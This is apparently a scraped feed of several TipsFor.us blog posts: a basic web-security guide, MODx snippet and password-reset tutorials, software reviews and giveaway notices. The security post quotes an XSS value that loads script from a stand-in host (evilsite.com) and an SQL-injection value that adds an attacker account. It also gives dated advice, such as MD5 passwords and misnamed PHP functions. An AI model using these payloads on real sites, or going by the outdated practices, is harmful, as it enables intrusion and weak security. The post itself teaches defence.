You've been F'd in the A!

Make Rolling Backups

If you do nothing else, make sure you are backing up your site and its databases. So long as you know if/when your site fails (or is hacked) and have the ability to roll back to a known good state, you have little to fear.

Make SURE you practice restoring a site from your backups! An untested backup is worthless. Nothing is worse that THINKING you have a viable backup only to discover that it is actually corrupted.

As your backup needs mature, consider storing them offsite, e.g. on Amazon’s S3 service.

I’m supplying two of my most-used backup scripts for those in need. These are fairly simple, but they will work on shared hosts. They will backup a web site’s files and its databases.

Be Diligent about Passwords

You’ve probably heard this a hundred times before, but it is really important:

• Avoid simple passwords! Try mixing up combinations of smaller units, e.g. “AlphaBetaCharlie” instead of “abc”. Be creative. You can have strong passwords that are easy to remember!
• Store your passwords in a safe place, e.g. in a password manager like KeePass or in an encrypted disc image
• Change your Passwords Frequently! Literally, but this in your calendar so you remember to do it on a periodic basis. This helps avoid brute-force attacks.
• As a secondary line of defense, you can put an .htaccess password on your manager pages. All this does is slow down a brute-force attack by forcing the attacker to crack an additional password.

Password Protecting Directories using .htaccess

This adds an additional layer of authentication to a site or to a page; it’s not meant to substitute for more robust firewall rules or active filtering, but it is easy to set up.

First, create a username and password in a file that .htaccess can read. This can be done on the bash command line using the htpasswd command:

htpasswd -c /path/to/htpassword/file name_of_user

Next, add the following to your .htaccess file. Be sure you reference the file you just created above:

AuthName "Protected Area"
AuthGroupFile /dev/null
AuthType Basic
AuthUserFile /path/to/htpassword/file
Require valid-user


For some more detailed information on .htaccess passwords, see this page.

Stay Patched

Make sure you’ve got an updated version of your operating system, your scripting language (PHP), your database (MySQL), and your software (Wordpress, MODx, etc.). Sometimes applying patches can be scary, but it’s a lot less so if you’ve got those rolling backups in place!

I want to make mention of a very useful tool: SimpleScripts. It’s available on Bluehost accounts; it provides one-click installs of many web software packages (like Wordpress and MODx) and it will alert you to update them when you log into your cPanel. It’s a real time-saver!

Clean your Room!

• Do not install superfluous/untrusted software on your site! Don’t go dumpster diving for code that’s going to end up on a public-facing web site!
• Shut down services you’re not using (e.g. blog posts) because it takes more time to secure them.
• Do not store backups or sensitive data inside your document root!
• Encrypt sensitive data
• Check permissions.

Don't put backups or database dumps in your document root!

Make sure you organize your site’s files in a way that ensures that only you have access to sensitive data like backups or database dumps. These should NEVER be stored in the publicly viewable document root!

Cross Site Scripting

Behold the terror that is:

<?php print $_GET['x']; ?>

That code should NEVER be used on a public site because it effectively gives free access to the public to put whatever they want on your site! This type of code often sneaks into pagination links or into code that re-populates forms, e.g.:

<input type="text" name="myfield" value="<?php print $_POST['myfield']; ?>" />

where the ‘myfield’ variable contains something like:
" /> <script src="http://evilsite.com/js/screwed.js"></script>

For a list of values you might want to try pasting into form fields to see if they are secure, check out this great cheat sheet at http://ha.ckers.org/xss.html

In the end, be REALLY aware of any user-submitted data. Users can put their own data into ANY form field, and into any cookie, so anything in the $_GET, $_POST, or $_COOKIE arrays (and also the $_REQUEST array) is inherently insecure and should be carefully filtered. These are like the STDs of the web!!!

For articles about web hacks and some good real-world examples, check out other articles on http://ha.ckers.org/

Don’t Take Cookies From Strangers!

If you thought cookies were somehow immune to the area of security threats, they are not! It’s easy to write your own! The Firefox Web Developer plugin lets you easily create your own cookies. This is great as a web developer, but it can also be a sneaky tool for a hacker to introduce unintended code to your application, so filter cookie contents as carefully as you would the user-submitted forms.

Cookies also store the PHP session id; all $_SESSION data is stored on the server, but the unique key that associates that data with the user is stored in the user’s cookie. If one user authenticates, it’s possible for another user to make requests using that $_SESSION id! Especially with applications that require a login, it’s good practice to get a new session id using session_regenerate_id().

Filtering data

Every time you submit form data, you should write your regular expressions very carefully so your application accepts ONLY clean, valid data. In general, if you can keep input as simplistic as possible, it tends to be easier to secure. Integer only inputs are “safer” than alphabetic inputs. Alphabetic input is safer than input that accepts HTML tags, and so on.

Consider the following filters:

Type-Casting to force integer only values:

<?php
$x = (int) $_GET['x'];
?>



Alphabetical Characters Only:


// Accepts only letters a-z (case insensitive)
function alphabetical($str)
{
if ( preg_match('/^([a-z])+$/i', $str) )
{
return $str;
}
else
{
return FALSE;
}
}


For PHP coders, get familiar with the preg_replace() function: it offers a more standard regular expression syntax (the often emulated Perl syntax). Also have a look at the strip_tags() function.

Frame Buster

A common trick used in phishing scams or to perpetrate click fraud involves iframe-ing a site. Basically, the “trick” relies on the HTML iFrame tag to make one site display the contents of another without being obvious to the casual user.

One partial solution to this common attack vector is to use some simple javascript that checks to ensure that the page the parent page and not being iFramed:

<SCRIPT LANGUAGE=JavaScript>
<!--
if (top.frames.length!=0)
top.location=self.document.location;
// -->
</SCRIPT>


Do a Google search for “frame buster javascript” to find other examples.

SQL Injection

This is a very broad topic, and there are numerous ways that SQL-injection might be used to compromise a site, but they all rely on the same principle: you construct strings of SQL statements and issue them against your database. If a malicious user is able to put his own data into one of those strings, it’s possible that a user can execute queries on your database that you never expected. This often gets back to form-validation and the ever important task of filtering user-submitted data!

Here’s a not-so-hypothetical PHP example:


$username = $_POST['username'];
$sql = "SELECT * FROM `users` WHERE `username`='$username'";

where $username contains something like:
'; INSERT INTO users (username, password) VALUES ('hacker_dude', MD5('xxxxxx') )


When that executes, 2 different queries are sent to the database instead of one, and if your’e not careful, it can allow an attacker to gain access to parts of your site and delete or steal data.

One strong line of defense against this type of attack is using a robust database driver that allows for the use of prepared statements (available since MySQL 4.1): where you prepare a statement once, then execute it multiple times with only certain defined variables changing. What this does is it allows you to define your query and only let the user supply the variables to be used in that query. This is a much more sensible option than letting the user essentially construct the query from scratch.

More mature database driver libraries (such as phpmysli) will allow you to use prepared statements.

You should also get familiar with escaping quotes in your database queries; this isn’t anywhere as effective as using prepared statements, but sometimes you have to use statements that aren’t prepared, so get familiar with how to escape strings before sending them to the database. In PHP, use the mysql_real_escape() function.

Finally, consider setting up special database users and roles to handle different types of queries. If a query is hijacked, it can only execute with the same permissions as the database handle. In other words, you wouldn’t grant delete or insert permissions to a database handle that was used only for selecting data. It’s more work to set up your database handles this way, but it may help prevent an attack from succeeding.

Conclusion

Watch your cornhole. There’s a lot going on a web site, and there are a lot of ways to abuse the technologies that run them. If you understand how the exploits occur, you’ll be better prepared to prevent them.

Post from: TipsFor.us


Basic Web Security

As the name implies, this book works through the marriage of the popular WordPress software and the WP e-Commerce plugin offered by getshopped.org. Like most of my writings, it’s a tutorial, though on a much grander scale than a simple post.

You can read all about it on Amazon (though the title is wrong – yes, it’s 2.9, not 2.8), but suffice to say that this book is aimed toward anyone who wants to sell either physical goods or digital downloads using the familiar WordPress software. It’s a comprehensive overview, but I especially spend a lot of time discussing the nitty-gritty of payment setup (both PayPal and Google Checkout) as well as the myriad of shipping options and how to handle them.

It was exciting enough to send in the final revision earlier this year, but holding the complete book in my hands is a feeling beyond words to describe. I’m proud of this book, and I hope it helps budding entrepreneurs and hobbyists alike.

Book Giveaway

And now I’d like you to hold the book in your hands! I have two copies to give away, and will gladly mail them at my expense to two readers. To enter, all you have to do is leave a comment on this post. On Monday, 19 April 2010, I will randomly select two winners and notify them. I will ship worldwide, so anyone can enter.

Good luck!

Post from: TipsFor.us


Book Announcement – WordPress 2.9 e-Commerce (plus a giveaway)

DISCLAIMER: The review only reflects my own experience using each product for about an hour each; I’m not affiliated with any of these companies.

Campaign Monitor

Price: Pay as you go: a flat delivery fee of $5, plus 1 cent for each recipient.

Templates: HIGH MARKS. You can get started with a library of their own templates, and you can easily customize the HTML and CSS via their custom tags, e.g.
<$title$>
Or
<$title link='true' default='Enter Title Here'$>
They provide a good cheatsheet and plenty of template samples.

Limits: only 10 custom fields allowed on email forms.

API: HIGHEST MARKS. Very well documented, code samples of each method in various languages. Like Mail Chimp, Campaign Monitor also offers plugins to various CMS’s including WordPress, Drupal, Joomla, Expression Engine etc.

Demo: Yep, try it totally free. You only pay when you send an email.

Summary: Very easy to use, offers one of the most flexible templating systems available with a lot of samples and a really helpful CSS comparison guide for styling emails for different email clients. Campaign Monitor distinguishes itself from Mail Chimp with its ability to resell distributions (you can set up campaigns for multiple clients through one account) and its payment structure.

Constant Contact

Price: uses pricing tiers based on the max number of emails you will send. Starts at $15 a month for up to 500 emails/month; there are also limits to the number of images you can host in your account.

Templates: Somewhat limited… the UI felt boxy, and although they support custom HTML/CSS, the pseudo code they used did not resemble anything I’d seen before: it uses XML-looking tags, so they are difficult to see once they are actually used alongside HTML. Clicking on the help links dumped out to a PDF page… but the PDF never loaded, so I had to email customer service before I could check out the Advanced Editor’s Guide and see how they handle templating.

Limits: varies per subscription level; the site itself is not friendly with Safari, and there were problems accessing their PDF docs.

API: Yes, but it’s a little hard to find: http://developer.constantcontact.com/. The interface is very XML centered (which is not PHP’s strong suit) and the docs are a bit hard to navigate and don’t include many examples. As expected, you can Import Outlook or csv files to populate your contact list.

Demo: 60 days with full support.

Summary:
The strengths are that this company also does Online Surveys and Event Marketing in addition to the Email Marketing, and they get HIGH MARKS for customer service — a representative called me to follow up and sent me an email with links for everything I asked for. But I have to take off points for limiting special characters in the account passwords (If you’re gonna pretend like you care about my password strength by putting a Password Strength widget on your form, then you gotta follow through and allow special characters in the passwords!). Their representative assured me that their email templates were tested and functional across all browsers, but their control panel doesn’t work with Safari and there were problems accessing the PDF documents — even their little helpful survey widget asking “how you doing?” failed to submit properly, probably due to some browser-specific Javascript.

Mail Chimp

Price: HIGHEST MARKS! 3 options:

• Monthly (50k subscribers): starts at $380, up to 600k sends.
• Pay as You Go (you buy “email credits”, starting at 3 cents per email)
• Forever Free (up to 3k sends/mo, list less than 500 contacts, emails include affiliate badge in footer)

Limits:
no built-in surveys, but there is a built-in integration with SurveyGizmo.

API: Yes! HIGH MARKS! Documented for PHP, with some code samples in many languages. There are plugins for Drupal, FoxyCart, ExpressionEngine, etc.

Templates: HIGH MARKS! Yep, you can choose from their starter templates or use your own HTML/CSS using tags like this:

*|MC:SUBJECT|*
The tags even support if statements and formatting options. Template Language documentation is here: http://www.mailchimp.com/resources/email-template-language

Demo: Yep, free to try for as long as you’d like.

Summary: High marks all the way around. Flexible pricing options, custom templates, thorough API, and helpful videos. This is a very good product.

Topica

Price: starts at $49.95 for up to 1,000 names… but the pricing page is hard to find.

Templates: You can use your own HTML, CSS, and images, but you can’t store them on their server — it’s a bit difficult to see where to do this, exactly: go straight to the “Campaigns” menu and choose to use “No Template”. You can use up to 15 custom tokens (configurable under “Preferences”), e.g. ${token1}, but heavy use of tokens is discouraged because it increases database load.

API: Yes, it’s SOAP based, but (again) it’s hard to find: http://topica.com/services/. As expected, you can do bulk imports and bulk exports of contacts or audience data.

Demo: Limited 14 day “demo” is available, but it’s really an “opt-out” purchase requiring credit card authorization “If you do not cancel during your trial period, your account will remain active and be charged a minimum monthly fee of $49.95″ as well as $0.01 per name in your database if you use more than your selected capacity.

Summary: Topica gets HIGH MARKS for customer service, and their biggest strength is that they’ve been around a long time and their servers are said to be in the “good-graces” of most ISPs and, like Constant Contact, they got people available to take your calls. They have reasonable customer service: questions were answered during normal times. However, the site is hard to navigate, it has some browser display issues and even a couple 404 errors in the control panel (!), and searches for documentation tended to funnel me back to contact their sales/support people instead of to actual pages. And personally, I’m not too keen on an opt-out purchase agreement in order to “demo” the software.

Summary

In summary, I’d say that MailChimp and Campaign Monitor were the best I looked at: both offered very flexible templates, thorough examples, and a flexible, well-documented API. I’d have to say that Campaign Monitor code samples are amongst the best I’ve seen, but Mail Chimp has excellent documentation and an equally flexible templating system. Topica came across as a bit boxy and overpriced for smaller campaigns given its features. Constant Contact was somewhere in the middle… I know it’s a popular option, but browser issues in the control panel and the lack of a sensibly-documented API make it an unattractive option for me.

Post from: TipsFor.us


Comparison of Online Email Marketing Companies

Giveaway Link

The Data Recovery Wizard is capable of recovering deleted files, but it can do much more. It can also help recover files on a disk partition after an accidental format, or even restore a lost partition.

Supported filesystems include FAT and NTFS, and supported operating systems include Windows 2000, XP, and Vista (32-64 bit). Unfortunately, it appears that Windows 7 is not officially supported.

Did you miss this giveaway, or want to try a comparable freeware program? Give Recuva a shot.

Post from: TipsFor.us


Get EASEUS Data Recovery Wizard for Free (Giveaway)

Click here to view the embedded video.

Adding a Snippet

MODx newcomers are sometimes confused as to where to upload the PHP files… YOU DON’T UPLOAD IT. You paste it into a database record. You can reference files on the file system, but you don’t have to.

1. To add a Snippet from the MODx (v1) manager go to Elements –> Manage Elements –> Snippets then paste in your PHP code.
2. Be sure to give it a unique name (I recommend avoiding spaces in the name)
3. Give it a category: this will make your Snippet easier to find in the manager.

Recommended Components of a PHP Snippet

This applies to ANY code you write, but for the record, please include the following documentation as comments in your Snippet:
1. SUMMARY: a sentence describing what the Snippet does.
2. INPUT: list any input variables the Snippet can accept. It’s good to note the data type (e.g. integer/string), whether or not they are required, or whether or not they have a default value.
3. OUTPUT: list any special output created by the Snippet. Usually it’ll just be HTML, but it’s good to note any external actions (e.g. whether it updates a database row).
4. EXAMPLE: give an example of how the Snippet should be called.

Sample Comment Block


/*---------------------------------------------------------
SUMMARY: Formats list of cartoon characters using referenced chunk
INPUT:
$chunk_name = string; Name of Chunk to be used for formatting output.
OUTPUT:
HTML or it logs an error.
EXAMPLE:
[!ComicExample? &chunk_name=`myChunk`!]
----------------------------------------------------------*/
?>


Coding Suggestions and Rules of Thumb

1. Develop your Interface before you code: that bit about adding comments isn’t just for other users, it can help you determine how you want to be able to interact with your code. Coding to an interface is good way of establishing goals and structure before you even start writing the actual code.
2. Initialize your variables: This cuts down on the possibility of security exploits, bugs, and it makes your code easier to read, e.g.:
$output = '';
$garfield_characters_array = array();

3. Sanitize your input: if you are getting any user entered data (e.g. anything out of the $_POST or $_GET array), sanitize the data using regular expressions and if/then statements. Make SURE you have eliminated any possibility that the data is something other than what your program expects.
4. Test as you Go: PHP doesn’t have a built-in debugger, so don’t go too long without checking to see if your code still “compiles” (technically, you should check to see if it has a valid syntax and if it executes). Checking often will help you track down where you made a mistake.
5. Use Good Variable and Function Names: be descriptive. Don’t become a member of the hated “ASCII Preservation Society”. Besides, if you use unique variable names, it becomes MUCH easier to search for instances of that variable, and you’re less likely to have variable collisions.
6. Group your Code into Units: In a word, use functions that fit on the page. If you can SEE it, you’re less likely to UNDERSTAND IT. Chapters of uninterrupted code are hard to debug and test.
7. Reuse your Code: if there are cases in your code where you’re copying and pasting identical or NEARLY identical parts, then it’s time to relegate that code to its own separate function.
8. Log your Errors: if something goes wrong, let your users know about it. It’s a wonderful thing to use the MODx logging function.
9. DO NOT MIX HTML and PHP! There are a few cases where where this is acceptable, but it is good architectural design to separate your view (i.e. your HTML) from your logic. If you have to edit your PHP code to change div tags or CSS classes, then you probably did something wrong. Instead, use MODx Chunks to format Snippet output; your code will be MUCH cleaner as a result and MUCH easier to maintain.

Including Files from the File System

If you write anything more than simple Snippets, you’ll want to put your PHP file(s) on the file system and reference them from the Snippet stored in the MODx database. You can do this by including a standard include or require statement, e.g.

include($modx->config['base_path'].'assets/snippets/mysnippet/include_me.php');

The standard MODx location would be in your own folder within the /assets/snippets directory.

Things to Remember When Including Files and Using Functions

1. Variable Scope: the $modx super-object and the methods that go along with it will not remain in scope within a funciton; use the global to ensure that the globally scoped $modx variable instance is used inside the function. Compare the two instances of the same API call:
// INSIDE a function
function inside_a_function($chunk_name,$garfield_characters_array)
{
global $modx;
$output = $modx->parseChunk($chunk_name, $garfield_characters_array, '[+', '+]');
return $output;
}

// Or OUTSIDE a function
$output = $modx->parseChunk($chunk_name, $garfield_characters_array, '[+', '+]');

2. You can’t return a value directly from an included file: because MODx treats Snippets as functions, it’s considered good form to always return a value, e.g. “return $output;” or “return TRUE;” but this MUST be returned from the original Snippet in the database; if you return output from the included file, you’ll have to return it again from the original database Snippet code. See the video for this quirk in action.
3. Take advantage of the File System: if you are developing stand-alone PHP files, you can use the bash terminal (on Linux or OS X machines) to test the PHP syntax. Simply navigate to the directory where your file is and type:
php -l name_of_your_file.php

Post from: TipsFor.us


Writing Custom PHP Snippets for MODx (part VII)

If you have access to your MySQL database, you can still log into the MODx manager.

First off, if you are locked out of your MODx manager, you can use the standard link on the manager page to email you your password, but I’m outlining how to do this in the event that you either didn’t enter a valid email address or you aren’t receiving your emails somehow. There are two things I’m going to outline:

1. Resetting your MODx manager password
2. Adding a new MODx manager user

WARNING: Both options require that you have read/write access to the MySQL database where the MODx information is installed. PROCEED WITH CAUTION… THIS REQUIRES DATABASE EDITS.

Option 1 is nicely outlined by this article at Lucid Green: How to get into MODx when your blocked or lost your password. The article is a bit dated (2006), but it’s still valid… to summarize, do the following:

Resetting Your MODx Manager Password

We’re going to do two things here: change your password, and clear any blocks on your manager user.

1. Login to your site’s database (e.g. using phpMyAdmin).
2. Find the table modx_manager_users –in phpMyAdmin, find the table in the list on the left.
   

   phpMyAdmin lists all tables on the left-hand side

   NOTE: the modx_ is the default table prefix… your installation may use a different prefix, or it may use no prefix. If you honestly can’t the table, you may have to resort to the following query to find the table: SHOW TABLES LIKE '%manager_users';
   

   

   Can't find the table? SHOW TABLES WHERE ...

   Type that at the MySQL prompt and any tables with a name ending in “manager_users” will be shown.

3. Select your user from the list — in phpMyAdmin you can click the “Browse” tab to browse the rows in each table. Choose to CHANGE or EDIT the row.
   
   

   Edit your user

4. Select the MD5 function to operate on the password column. In phpMyAdmin, when you edit a record, you can use functions to operate on each column. Once you’ve selected to use the MD5 function, you can type your new password normally.
   
   

   Make sure you use the MD5 function!

   If you are doing this via the MySQL command line, the actual query we execute looks something like this:
   UPDATE `your_db`.`modx_manager_users` SET `password` = MD5( 'changeme' ) WHERE `modx_manager_users`.`id` =1 LIMIT 1 ;

   NOTE: if you execute this query at the command line, you must type apostrophes to delineate your password (they will not be included as part of the password). If you are doing this via phpMyAdmin, do NOT type the apostrophes.

5. Save the changes to the row.
6. Please note the id for the row that you just edited… you may need it.
7. Go to the modx_user_attributes table and find your manager user and edit this row (here’s where it’s handy to have that id from the above steps.
8. Change only the following items then save the row:
   * Set “blockeduntil” to zero (0).
   * Set failedlogincount to zero (0).
   
   

   Remove blocks on your user

   
   On the MySQL command line, your query looks something like this:
   UPDATE `your_db`.`modx_user_attributes` SET `blockeduntil` = '0',`failedlogincount` = '0' WHERE `modx_user_attributes`.`id` =1 LIMIT 1 ;
9. You should now be done… head over to yourdomain.com/manager and login using your new password.

Adding a New MODx Manager User

This is a bit more devious, but the commands aren’t much different than the above, except that we are INSERTING rows into 2 tables instead of UPDATING them. There are many times I’ve needed to “let myself in” using this technique…

1. As above, login to your site’s database (e.g. using phpMyAdmin).
2. As above, find the table modx_manager_users –in phpMyAdmin, find the table in the list on the left. (If you have trouble finding the table, see the tip in step #2 above).
3. Instead of updating an existing record, we are going to create one — in phpMyAdmin, click the “INSERT” tab. Be sure that you do the following:
   * type a valid username (usually, this is one word, lowercase)
   * type a valid password (use the MD5 function!)
   * Leave the id field blank (it will auto-increment).
   * Select “MD5″ as the function for the password field (don’t forget!)
   * Leave the “Ignore” box checked — phpMyAdmin allows you to insert a couple rows at once, but we only need to insert one.
   
   

   Create a new User

   Then click Go to insert the new record.

   The actual MySQL query used here is something like this:
   INSERT INTO `your_db`.`modx_manager_users` (
`username` ,
`password`
)
VALUES (
'everett', MD5( 'changeme' )
);


4. Remember the id of the newly inserted user! You’ll need it — phpMyAdmin shows it after the row was inserted. If you misplaced it, you can simply browse the table and find your user — remember the id!
   
   

   The new User's ID is shown here

5. Go to the modx_user_attributes table and insert a new row:
   Add the following values:
   * id LEAVE BLANK. It will auto-increment.
   * internalKey should also be equal to the your user id from step 4.
   * role = 1 (for manager users)

   The actual query looks something like this:
   INSERT INTO `your_db`.`modx_user_attributes` (`internalKey` ,
`role`
)
VALUES (
'9', '1'
);

6. That’s it. You should now be able to use that username and password to login into your MODx manager at www.yourdomain.com/manager

Post from: TipsFor.us


Forgot your MODx Password? You can reset it…

Systems:  Windows Only (2000, XP, Vista, 2008 / Both 32 and 64 bit)

Donationware:  Technically it’s free, but when you see the level of craftsmanship in this program, you will want to donate.

Website: Softperfect.com

I recently changed ISPs to one with much more consistent service, but the trade off is that I now have a rather small bandwidth cap.  As much as we hate them, bandwidth caps are probably in all of our futures.  The important thing is to have control over and be informed of your usage (before the bill arrives).  I needed a reliable way to keep track of my bandwidth, so I tested out several free bandwidth monitoring softwares.  My ISP has its own online bandwidth usage calculated, but I wanted a redundant system (one which I could use to make sure they were honest in their tracking).  In my experiments, I found Networx to be the best.  Its primary virtue is its ability to be as advanced as you need it to be.  For my multiple computer home network, it has every feature I could ask for.  Let’s take a closer look.

The software is so unobtrusive; it even lacks a full control window.  Instead, you can access all aspects of the software from the taskbar icon.

A left click will give you a quick bandwidth summary/ a right click will show you the menu.

Before we get to ridiculous number of features available in the menu, let’s check out my favorite feature. A right click anywhere on the task bar brings up a windows menu that has a “toolbars” option, if you go there you will find a new entry: “Networx Desk Band.” Activating this toolbar gives you a quick real time read out.

I know what you’re thinking: “But I don’t like red and white graphs!” Well, you can fully customize that little read out; I’ll get to that a little later on. First, lets go back to that right click menu from the Networx taskbar icon.

Your first 3 options all work together:

Show Graph

– This displays a full size visual read out that you can place on your desktop wherever you want.

Reset Graph (Only present if “Show Graph” is clicked first)– This option will clear the current data displayed on the graph, not unlike the trip counter reset in your car.

Enable Click Through (Only present if “Show Graph” is clicked first) – Will make the graph act as if it is not really there. You can literally click through the graph to select things. Be careful though, this means you can’t resize or move the graph window without turning off “Click Through” the same way your turned it on.

Speed Meter

– This works sort of like a heart monitor for you bandwidth. You hit “Play” and for the duration you allow it to run, it records average, maximum and total transfer. You can then export it directly to a txt file.

Usage Statistics

– You can access this menu from a double click on the icon. This will probably be your most visited window in the battle to keep informed about transfer totals. The first thing you will see is the “General” Tab:

Not much to do here, except see a quick summary of your total usage all in one place.

The Daily Report – Here is where you can really begin to see detail present in this program. If you have this set up on the family computer, you can directly see what day of the month the highest transfer happened. If you are not a fan of the spread sheet, they also provide you a visual readout of the past week.

Weekly/Monthly Report – The same data as the daily, but handily calculated for you either size increment.

Custom – The most powerful data aggregator in this entire software. You can give it the date-through-date specifics and it will automatically set up the graph in the most appropriate way.

Dial-up Sessions – If you have a minute/transfer based dial-up connection, this tab is vital. It records every time you connect to your dial up provider, the date, amount of time spent, transfers, etc. You might think this is outdated, but you would be surprised how many areas still do not have broadband.

Hourly Rates – for you true statistics hounds out there, you can follow your transfer rates on an hourly basis.

Export – Oh yeah, you can also export all of these charts to Excel for easy archiving.

Users- If everyone who uses the computer has separate logons, you can track the data per user. You know, easily figure out which roommate is the bandwidth hog.

Quota

– This is a handy system for letting you set the maximum transfer/duration. For me that is 50 gigs per month. I set it at 45 gigs, however, because it notifies you with a little pop-up window when you have met your quota.

Settings

– All of the settings for the program. Let’s go one tab at a time.

General – This tab has the settings for “Load on Windows Startup,” “Check for Updates,” And most importantly: Which internet connection is monitored. This is essential if you have multiple connections, or utilize a different connection for intra-network traffic.

Graph – Settings to tweak how the graph output functions. This is really for power users who want control over aspect of their graph.

Graph Colors – This may seem trivial or nit-picky, but on some monitors you may want to adjust the colors of the graph for optimal resolution. High contrast is an option in every aspect of most operating systems for those who need it for accessibility. Or, you may just want to make it look pretty.

Notifications – This tab’s settings tell the software when you notify you of certain things. It can tell you if your connection falls below it’s usual transfer rate, or if it exceeds a predetermined speed. You can also customize how exactly it notifies you, a tone or a pop up, ect.

Advanced – There is one truly important feature in here. In this tab you can set what day your billing cycle begins on. I’m lucky, my bandwidth resets at midnight on the first. For some of you, it might be on the 14^th or 21^st, etc. DO NOT FORGET TO SET THIS, OR YOUR TOTAL BANDWIDTH USED FOR THE MONTH WILL NOT BE ACCURATE!

If you have multiple computers using the same network, you will need to install Networx on all of them, and tick the box under “Synchronization” or else YOU WILL ONLY BE TRACKING THE DATA TRANSFERRED FROM THIS COMPUTER. That will not be an accurate measure of the total usage.

Trace Route

– This is a power user feature. Your average user will never have a need to track a packet from your computer to a source IP.

Ping

– This works the same way as the command line ping. You enter a location to ping, and it will tell you the millisecond duration of the test transfer.

NetStat

– This is pretty useful, it lists every program or service that is accessing the internet, or has rights to do so, and where it’s sending from and to.

Conclusion

So that’s about all you need to know to keep up with your bandwidth use by utilizing Networx. If you have a different favorite Bandwidth tracker, let us know in the comments below. I am on month 2 of using Networx, and have had no problems, if you have, also let us know. At the end of my first month of use, there was a 458 megabyte discrepancy between my Networx report and my ISPs total report. I attribute this to the Xbox360 updates and purchases along with my IPhone app downloads.

Post from: TipsFor.us


Networx –Free Bandwidth Monitoring Software (Getting the Most Out of It)

Many thanks to all of you who entered. Stay tuned for future giveaway announcements, as we plan to host several more giveaways on TipsFor.us. What might we give away next? Maybe some RAM, a Macbook, or maybe some California IOUs?

Post from: TipsFor.us


TipsFor.us Giveaway – iPod Touch Winner Announcement

Think of tunesBag as an online version of iTunes that grants you access to your full audio library from any computer with an Internet connection. Since it’s entirely web based, it lacks features such as CD ripping and iPod syncing, but that’s not really the point. What it does offer is the ability to sit down at any computer and immediately have your full music library at your disposal.

Here’s the main window. Hard to believe this is all running in a browser, huh?

Uploading Your Music

tunesBag offers several ways to upload your music files, including a browser-based uploader, an installable Desktop Uploader (currently Windows only), via e-mail, and directly from elsewhere on the Web.

There’s currently no hard limit on how much you can upload, though they do ask that you contact them if you plan to upload more than 5-7 GB of files. tunesBag supports MP3, M4A, WMA, and OGG. Audio files laden with DRM are not supported, sorry.

The browser uploader allows for multiple-file uploads, plus creating a playlist for the uploaded files.

The Desktop Uploader (Windows only) has some more advanced features. Those of you with existing iTunes or Winamp libraries will appreciate the ability to upload your existing library (or just selected playlists). No such love yet for us MediaMonkey fans, but perhaps the developers could consider it for future releases.

Another cool feature of the Desktop Uploader is that you can use it to completely restore your original audio files back to your computer in case of catastrophic hard disk failure. In this sense, tunesBag functions as a backup for your original files.

General Usage

After you have uploaded audio files, tunesBag will analyze them for you and create acoustic fingerprints to help you fix any missing or incorrect elements, such as the album name or cover art. This is a pretty handy feature, and tunesBag will present to you multiple options in case there’s a potential conflict.

While playing a song, you have control over playback using the transport bar at the bottom of the page, including options for volume, repeat, and randomize.

Just like with most media players, you can search and sort your music library by genre, artist, or album. You can also create any number of playlists that you like.

Whenever you hover over each Title, you can bring up a menu for each song by clicking the arrow. This presents a number of options, such as adding that song to a playlist, commenting, sharing, editing Meta information, and deleting. You can also download the original audio file.

Only the original owner can actually download the original audio file, but this brings up the issue of file sharing.

Sharing

Since tunesBag runs completely online, it seems only natural that the ability to share files should be inherent to the way it works. It is… to an extent.

You can share individual files or full playlists in just about any way imaginable: by e-mail, via social networking sites like Facebook and Twitter, or through a direct link to a sharing page. You can also add friends and view their music directly within tunesBag.

The important aspect here is that friends can only stream your music (and vice-versa) – they cannot download and keep the original files. While I am definitely not a lawyer, the streaming-only nature of tunesBag should keep it protected from the likes of the RIAA. tunesBag is a legal service in Austria, the country in which it operates.

See for yourself – Want to listen to that Apocalyptica album that I uploaded in one of the above screenshots? Sure, just click here.

Invitations

While in beta, tunesBag is completely free. While they may eventually offer premium services, hopefully a free version will always exist.

The private beta requires an invitation to join. We have 18 invitations available for TipsFor.us readers. To receive an invitation, just ask for an invite in the comments below. Be sure to leave your valid e-mail address in the e-mail field. We’ll contact you as soon as possible. As always, first come, first serve!

Post from: TipsFor.us


TunesBag Stores and Shares Your Music Online – Free Invites

Keep in mind that you can triple your odds of winning by both becoming a fan of TipsFor.us on Facebook AND also by writing a blog entry linking to our original giveaway post.

We’ll contact a winner on Monday, and that person will have 48 hours to respond before we choose a new winner. Don’t miss this opportunity! Good luck!

Post from: TipsFor.us


iPod Touch Giveaway Ends Tonight